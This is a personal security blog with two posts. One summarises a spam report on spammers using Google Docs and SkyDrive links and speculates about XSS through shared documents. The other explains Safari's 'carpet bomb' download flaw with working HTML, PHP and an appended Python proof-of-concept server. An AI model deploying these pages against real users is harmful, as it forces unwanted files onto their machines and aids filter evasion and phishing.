hac.’s Weblog


Just a place to share my life

Spam hits highest rate in 15 months

This month MessageLabs released a report on spam. It states that spam accounted for 76.8 percent of all email in May 2008, an increase of 3.3% since April, with 1 in 1.3 emails being spam. This is the first time I have read this kind of statistical analysis; I cannot imagine that so much spam is flowing around the Internet!

Why is there such a big jump? According to the report, spammers have started placing links in their messages that point to spam content hosted in documents on Google Docs and on Microsoft’s SkyDrive. The domain names they previously bought were being blacklisted quickly, whereas it is difficult to block Google and Microsoft services because they are so widely used by legitimate users. The report also notes that “the spammers are also taking advantage of Google Analytics to gauge their success with each spam run.”

Here is a simple example:

Click the following link and win the big money!!
http://docs.google.com/View?docid=dgmszc7x_312xstksmgn

After constructing the above example, I discovered that Google Docs has a “Report spam” link on the page above; I think this should allow a quick response to this new type of spam. I will give SkyDrive a try later.

Spammers are always seeking ways to bypass spam filters, and according to the report it is not reasonable for most filters to block links to Google Docs or Microsoft’s SkyDrive. The report describes the technique: the spammer inserts a URL in an email that leads the victim to a Google Docs-hosted page. The body of the spam contains nothing but the link to the free hosting service, yet that page leads the victim on to whatever the spammer actually wants them to visit.

Another thing in the report that shocked me is that the most spammed country is Hong Kong, with spam reaching 85.9% of all email. How many spam messages do you receive every day?

I am wondering whether this technology (e.g. Google Docs) could be used to perform CSRF or XSS by sending an email to a Gmail user saying that I have shared a document with them, when the document is actually going to steal sensitive information from them. The key question is whether Google Docs allows you to write client-side scripting in a document, or at least makes client-side scripting executable in it. Here is a quick demo in SkyDrive.

This link will execute a JavaScript alert function.
XSS demo in SkyDrive

If you have any ideas or comments about this, please feel free to leave a comment.

Filed under: news, spam

Safari Carpet Bomb

Most of you probably know what Safari is. If you don’t, let me describe it briefly: Safari is a typical web browser like Firefox and Internet Explorer, developed by Apple. Mac OS users are used to the fact that Safari does not ask for permission before downloading a file. This may not look like a security problem to most users, but some annoying things can be done with this behaviour. Consider a site http://iam.not.evil/ whose index page contains the following code.

<html>
<body>
<!-- every iframe fetches the same download, so one page load yields four files -->
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
<iframe src="get_file.php"></iframe>
</body>
</html>

Inside get_file.php we send a file to the user. My attempt is as follows.

<?php
// Read the payload to serve; the demo used an empty file named "evil".
$data = file_get_contents('evil');
// Tell the browser this is a file to save, not a page to render.
header('Content-Type: application/x-zip');
header('Content-Length: ' . strlen($data));
header('Content-Disposition: attachment; filename="evil"');
// Send the bytes and stop.
die($data);
?>

You may try it by visiting the following site. That page contains only one iframe, which tries to download an empty file named evil to your computer.
http://www.cse.cuhk.edu.hk/~hkho5/security/

Since Safari does not ask for consent before downloading a file, the implication is obvious: malware can be downloaded to the victim’s desktop without the user’s consent. On Mac OS this may not be a security problem in itself, but it certainly annoys users, who close Safari and discover how “beautiful” their desktop has become!
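To reproduce the whole chain on one machine, here is an added example (not code from the original post) that serves both the page of iframes and the attachment every iframe fetches from a single Python process, generalising the four-frame page above to any number of frames. The port 8000, the path /get_file, the empty payload and the generic application/octet-stream type (in place of the page’s application/x-zip) are assumptions for the demo.

```python
"""Carpet-bomb proof of concept: one process serves both the page of
iframes and the attachment that every iframe fetches (added example)."""
from html import escape
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Tuple
from urllib.parse import urlparse

# Assumed demo values: the post's demo used an empty file called "evil".
PAYLOAD_NAME = "evil"
PAYLOAD = b""            # constructed placeholder: zero bytes, as in the post's demo
DOWNLOAD_PATH = "/get_file"


def build_carpet_page(count: int, target: str = DOWNLOAD_PATH) -> str:
    """Return an HTML page with `count` invisible iframes that all load `target`.

    A browser that saves attachments without asking creates one file per
    iframe, which is the whole "carpet bomb" trick: more frames, more files.
    """
    if count < 1:
        raise ValueError("count must be at least 1")
    src = escape(target, quote=True)
    frames = "\n".join(
        f'<iframe src="{src}" width="0" height="0"></iframe>' for _ in range(count)
    )
    return f"<html>\n<body>\n{frames}\n</body>\n</html>\n"


def attachment_headers(filename: str, data: bytes) -> List[Tuple[str, str]]:
    """Headers that make the browser save `data` as a file instead of rendering it.

    Same three headers as the PHP script above; the filename is stripped of
    quote and newline characters so it cannot break out of the header value.
    """
    safe = "".join(c for c in filename if c not in '"\r\n')
    return [
        ("Content-Type", "application/octet-stream"),
        ("Content-Length", str(len(data))),
        ("Content-Disposition", f'attachment; filename="{safe}"'),
    ]


class CarpetHandler(BaseHTTPRequestHandler):
    """Serves the iframe page at / and the attachment at DOWNLOAD_PATH."""
    frame_count = 4  # the post's index page used four iframes

    def do_GET(self) -> None:
        path = urlparse(self.path).path
        if path == "/":
            body = build_carpet_page(self.frame_count).encode("utf-8")
            self._send(200, [("Content-Type", "text/html; charset=utf-8"),
                             ("Content-Length", str(len(body)))], body)
        elif path == DOWNLOAD_PATH:
            self._send(200, attachment_headers(PAYLOAD_NAME, PAYLOAD), PAYLOAD)
        else:
            self.send_error(404)

    def _send(self, status: int, headers: List[Tuple[str, str]], body: bytes) -> None:
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Point the browser under test at http://127.0.0.1:8000/ (assumed port) and
    # watch its download location: a browser that never prompts yields four files.
    HTTPServer(("127.0.0.1", 8000), CarpetHandler).serve_forever()
```

Run it, open the root URL in the browser you want to test, and count the files that appear in its download folder; a browser that asks for consent, or that coalesces identical downloads, produces fewer than frame_count files.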

This problem was discovered by Nitesh Dhanjani. He reported it to Apple, but Apple did not consider it a security issue. Microsoft, however, warned that this “special feature” of Safari can be combined with other behaviour into a blended attack on Windows XP and Windows Vista.

“Microsoft says it is the combination of the default download file location in Safari and how the Windows desktop handles the files that creates the blended threat on all supported versions of Windows XP and Windows Vista when Apple’s Safari for Windows has been installed.” (from ZDNet.co.uk)

It reminds me that just because something is natural or usual does not mean it is reasonable or safe!


ps. I don’t know how the Windows desktop handles files. Should you know, please let me know.

Filed under: app sec